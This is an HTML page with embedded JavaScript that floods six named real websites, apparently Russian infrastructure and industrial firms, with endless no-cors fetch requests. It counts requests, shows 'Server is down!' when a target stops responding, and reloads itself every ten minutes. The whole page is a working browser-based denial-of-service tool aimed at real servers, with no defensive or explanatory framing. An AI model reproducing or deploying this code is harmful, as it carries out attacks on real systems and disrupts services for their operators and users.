<script>
  const SITES = [
    "https://www.russianhighways.ru",
    "https://www.nornickel.com",
    "https://www.surgutneftegas.ru",
    "https://www.evraz.com",
    "https://nlmk.com/ru/",
    "https://www.metalloinvest.com",
  ];

  async function request(i, ord) {
    const currentRequestNo = SITES.length * i + ord;
    console.log("started request: ", currentRequestNo);
    i++;

    const siteToFetch = SITES[Math.floor(Math.random() * SITES.length)];
    fetch(siteToFetch, {
      mode: "no-cors",
      referrerPolicy: "no-referrer",
      headers: { "Content-Type": "application/json" },
    })
      .then((response) => {
        message("Requests: " + currentRequestNo);
        request(i, ord);
      })
      .catch((error) => {
        message("Requests: " + currentRequestNo + " Server is down!");
        request(i, ord);
      });
  }
  function message(text) {
    document.getElementById("message").innerHTML =
      document.getElementById("message").innerHTML + "<br><br>" + text;
  }

  for (let ord = 0; ord < SITES.length; ord++) {
    request(0, ord + 1);
  }

  // reload to pick up any new changes
  const TEN_MINUTES = 10 * 60 * 1000;
  setTimeout(() => window.location.reload(false), TEN_MINUTES);
</script>
<div id="message">Please wait</div>
